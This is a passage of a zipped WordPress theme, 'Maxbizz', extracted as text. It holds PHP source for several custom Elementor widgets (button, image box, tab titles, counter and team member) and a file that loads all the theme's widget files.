		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'button', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'button', 'rel', 'nofollow' );
			}
		}

		if( $settings['btn_style'] != 'arrow' ){
			$this->add_render_attribute( 'button', 'class', 'octf-btn' );

			$this->add_render_attribute( 'button', 'class', 'octf-btn-'.$settings['btn_style'] );
		}

		if ( $settings['hover_animation'] ) {
			$this->add_render_attribute( 'button', 'class', 'elementor-animation-' . $settings['hover_animation'] );
		}

		?>
		<div class="ot-button">
			<a <?php echo $this->get_render_attribute_string( 'button' ); ?>><?php echo $settings['text']; ?></a>
	    </div>
	    <?php
	}

	protected function _content_template() {}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Button() );PK�8FZP_�~.~.+inc/backend/elementor/widgets/image-box.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Image Box
 */
class Maxbizz_Image_Box extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iimage_box';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Image Box', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-image-box';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Image box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Image Box', 'maxbizz' ),
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .ot-image-box' => 'text-align: {{VALUE}};',
				],
			]
		);
		$this->add_control(
	       'image_box',
	        [
	           'label' => esc_html__( 'Image Box', 'maxbizz' ),
	           'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => Utils::get_placeholder_image_src(),
			  	],
		    ]
	    );

	    $this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'image_box_size', // Usage: `{name}_size` and `{name}_custom_dimension`, in this case `thumbnail_size` and `thumbnail_custom_dimension`.
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Marketing Research', 'maxbizz' ),
			]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h5',
			]
		);

		$this->add_control(
			'des',
			[
				'label' => 'Description',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'default' => [
					'url' => '#'
				],
			]
		);
		$this->add_control(
			'label_link',
			[
				'label' => 'Label Button',
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Explore More', 'maxbizz' ),
				'label_block' => true,
				'condition' => [
					'link[url]!' => '',
				],
			]
		);

		$this->end_controls_section();

		/***Style***/

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		/* gereral */
		$this->add_control(
			'heading_gereral',
			[
				'label' => __( 'Gereral', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_control(
			'box_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-image-box' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .content-box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-image-box' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'box_box_shadow',
				'selector' => '{{WRAPPER}} .ot-image-box',
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .title-box' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-box a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-box a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'link[url]!' => '',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .title-box',
			]
		);

		/* description */
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Description', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .content-box p' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .content-box p',
			]
		);

		/* button */
		$this->add_control(
			'heading_btn',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'btn_typography',
				'selector' => '{{WRAPPER}} .link-box',
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->start_controls_tabs( 'tabs_btn_style' );
		$this->start_controls_tab(
			'tab_btn_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'background: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_bcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_btn_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box:hover' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .link-box:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();

		$this->add_render_attribute( 'heading', 'class', 'title-box' );
		$title = $settings['title'];
		$title_html = sprintf( '<%1$s %2$s>%3$s</%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		$image_html = Group_Control_Image_Size::get_attachment_image_html( $settings, 'image_box_size', 'image_box' );

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'button', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'button', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'button', 'rel', 'nofollow' );
			}

			$image_html = '<a ' .$this->get_render_attribute_string( 'button' ). '>' .$image_html. '</a>';
			$title_html = sprintf( '<%1$s %2$s><a ' .$this->get_render_attribute_string( 'button' ). '>%3$s</a></%1$s>', $settings['header_size'], $this->get_render_attribute_string( 'heading' ), $title );
		}
		$this->add_render_attribute( 'button', 'class', 'link-box font-second' );

		?>

		<div class="ot-image-box">
			<?php echo $image_html; ?>
			<div class="content-box">
				<?php if( $settings['title'] ) { echo $title_html; } ?>
				<?php if( $settings['des'] ) { echo '<p>' .$settings['des']. '</p>'; } ?>
			</div>
			<?php if( $settings['label_link'] ){ echo '<a ' .$this->get_render_attribute_string( 'button' ). '><span>' .$settings['label_link']. '</span><i class="ot-flaticon-trajectory"></i></a>'; } ?>
	    </div>

	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'service' ];
	}
}
// After the Maxbizz_Image_Box class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Image_Box() );PK�8FZ��5e��,inc/backend/elementor/widgets/tab-titles.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Tab Titles
 */
class Maxbizz_Tab_Titles extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'itabtitle';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Tab Titles', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-site-title';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Titles', 'maxbizz' ),
			]
		);

		$repeater = new Repeater();

		$repeater->add_control(
			'titles',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => 'Content Marketing',
			]
		);
		$repeater->add_control(
			'title_link',
			[
				'label' => __( 'Link to ID Content', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => '#tab-1',
			]
		);

		$this->add_control(
		    'title_boxes',
		    [
		        'label'       => '',
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => false,
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{titles}}}',
		    ]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'flex-start'  => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'flex-end' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .tab-titles' => 'justify-content: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();

		//Styling
		$this->start_controls_section(
			'style_section',
			[
				'label' => __( 'Style', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 150,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .tab-titles .title-item' => 'margin: calc({{SIZE}}{{UNIT}}/2);',
					'{{WRAPPER}} .tab-titles' => 'margin: calc(-{{SIZE}}{{UNIT}}/2);',
				],
			]
		);

		$this->add_responsive_control(
			'padding_title',
			[
				'label' => __( 'Padding', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .tab-titles a' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_title',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .tab-titles a' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .title-item',
			]
		);

		$this->start_controls_tabs( 'tabs_title_style' );

		$this->start_controls_tab(
			'tab_title_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-item a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-item a' => 'background: {{VALUE}};',
				]
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_title_hover',
			[
				'label' => __( 'Active/Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'title_active_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-item a:hover, {{WRAPPER}} .title-item a.tab-active' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_active_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-item a:hover, {{WRAPPER}} .title-item a.tab-active' => 'background: {{VALUE}};',
				]
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="tab-titles">
			<?php foreach ( $settings['title_boxes'] as $box ) : ?>
			<div class="title-item font-second">
				<a href="<?php echo esc_url($box['title_link']); ?>"><?php echo $box['titles']; ?></a>
			</div>
			<?php endforeach; ?>
		</div>

	    <?php
	}

	protected function _content_template() {}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new MAXBIZZ_Tab_Titles() );PK�8FZ�RM��)inc/backend/elementor/widgets/counter.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Counter
 */
class Maxbizz_Counter extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'icounter';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Counter 1', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-counter';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Counter', 'maxbizz' ),
			]
		);
		$this->add_control(
			'pos_num',
			[
				'label' => __( 'Number Position', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'default' => 'left',
				'options' => [
					'left' => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-h-align-left',
					],
					'top' => [
						'title' => __( 'Top', 'maxbizz' ),
						'icon' => 'eicon-v-align-top',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-h-align-right',
					],
				],
				'prefix_class' => 'number-',
				'toggle' => false,
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'default' => 'center',
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-counter' => 'text-align: {{VALUE}};',
				],
				'condition' => [
					'pos_num' => 'top',
				],
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title:', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Current Clients', 'maxbizz' ),
			]
		);

		$this->add_control(
			'number',
			[
				'label' => 'Number:',
				'type' => Controls_Manager::TEXT,
				'default' => __( '180', 'maxbizz' ),
			]
		);

		$this->add_control(
			'after_number',
			[
				'label' => __( 'After Number:', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( '', 'maxbizz' ),
			]
		);		

		$this->add_control(
			'time',
			[
				'label' => __( 'Duration', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 1000,
						'max'  => 10000,
						'step' => 1000,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 2000,
				],
			]
		);

		$this->end_controls_section();

		//Style

		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Style', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Icon
		$this->add_control(
			'heading_number',
			[
				'label' => __( 'Number', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'number_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-counter span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'number_typography',
				'selector' => '{{WRAPPER}} .ot-counter span',
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}}.number-top h6' => 'margin-top: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.number-left h6' => 'margin-left: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}}.number-right h6' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-counter h6' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .ot-counter h6',
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
    	<div class="ot-counter icounter" data-counter="<?php echo $settings['number']; ?>">
        	<div class="c-number">
        		<span class="num" data-to="<?php echo $settings['number']; ?>" data-time= "<?php echo $settings['time']['size']; ?>"></span><?php if( $settings['after_number'] ) { echo '<span>' .$settings['after_number']. '</span>'; } ?>
        	</div>
        	<?php if( $settings['title'] ) { ?><h6><?php echo $settings['title']; ?></h6><?php } ?>      				        
	    </div>
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'funfact', 'number' ];
	}
}
// After the Maxbizz_Counter class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Counter() );PK�8FZ�W�ww)inc/backend/elementor/widgets/widgets.phpnu�[���<?php

require_once( get_template_directory() . '/inc/backend/elementor/widgets/heading.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/button.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/tabs.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/accordions.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/icon-box-1.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/icon-box-2.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/icon-box-grid.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/image-box.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/image-box-carousel.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/team-1.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/team-2.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/team-3.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/team-carousel.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/counter.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/counter-icon.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/flip-box.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/client-logos.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/testimonials-carousel-1.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/testimonials-carousel-2.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/progress-bars.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/switcher.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/pricing-table.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/tab-titles.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/post-carousel.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/portfolio-filter.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/portfolio-carousel.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/video-button.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/message-box.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/contact-form7.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/countdown.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/features-service.php' );PK�8FZ���7�7(inc/backend/elementor/widgets/team-2.phpnu�[���<?php 
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Team 2
 */
class Maxbizz_Team2 extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imember2';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Team 2', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-person';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		/**TAB_CONTENT**/
		$this->start_controls_section(
			'content_section',
			[
				'label' => esc_html__( 'Member Team', 'maxbizz' ),
			]
		);

		$this->add_control(
	       'member_image',
	        [
	            'label' => esc_html__( 'Photo', 'maxbizz' ),
	            'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => Utils::get_placeholder_image_src(),
				]
		    ]
		);
		$this->add_group_control(
			Group_Control_Image_Size::get_type(),
			[
				'name' => 'member_image_size',
				'exclude' => ['1536x1536', '2048x2048'],
				'include' => [],
				'default' => 'full',
			]
		);

	    $this->add_control(
		    'member_name',
	      	[
	          	'label' => esc_html__( 'Name', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
				'default' => esc_html__( 'Peter Perish', 'maxbizz' ),
	    	]
	    );

	    $this->add_control(
		    'member_extra',
	      	[
	          	'label' => esc_html__( 'Extra/Job', 'maxbizz' ),
	          	'type'  => Controls_Manager::TEXTAREA,
	          	'default' => esc_html__( 'co-founder of company', 'maxbizz' ),
	    	]
	    );

		$repeater = new Repeater();
		$repeater->add_control(
	      	'title',
		    [
		        'label'   => esc_html__( 'Name', 'maxbizz' ),
		        'type'    => Controls_Manager::TEXT,
		        'default' => esc_html__( 'Social', 'maxbizz' ),
		    ]
	    );

        $repeater->add_control(
            'social_icon',
            [
                'label' => esc_html__( 'Icon', 'maxbizz' ),
                'type'  => Controls_Manager::ICONS,
                'fa4compatibility' => 'icon',
				'default' => [
					'value' => 'fab fa-twitter',
					'library' => 'fa-brand',
				],
            ]
        );

        $repeater->add_control(
            'social_link',
            [
                'label' => esc_html__( 'Link', 'maxbizz' ),
                'type'  => Controls_Manager::URL,
                'dynamic' => [
					'active' => true,
				],
				'placeholder' => __( 'https://', 'maxbizz' ),
				'default' => [
					'url' => 'https://', 
				],
            ]
        );

		$this->add_control(
		    'social_share',
		    [
		        'label'       => esc_html__( 'Socials', 'maxbizz' ),
		        'type'        => Controls_Manager::REPEATER,
		        'show_label'  => true,
		        'default'     => [
		            [
		             	'title'       => esc_html__( 'Twitter', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.twitter.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-twitter',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Facebook', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.facebook.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-facebook-f',
							'library' => 'fa-brand',
						],
		 
		            ],
		            [
		             	'title'       => esc_html__( 'Pinterest', 'maxbizz' ),
		                'social_link' => esc_html__( 'https://www.pinterest.com/', 'maxbizz' ),
		                'social_icon' => [
							'value' => 'fab fa-pinterest-p',
							'library' => 'fa-brand',
						],

		            ]
		        ],
		        'fields'      => array_values( $repeater->get_controls() ),
		        'title_field' => '{{{title}}}',
		    ]
		);
		$this->add_control(
			'link',
			[
				'label' => __( 'Link To Details', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://', 'maxbizz' ),
			]
		);

		$this->end_controls_section();

		/**TAB_STYLE**/
		$this->start_controls_section(
			'content_style',
			[
				'label' => esc_html__( 'General', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
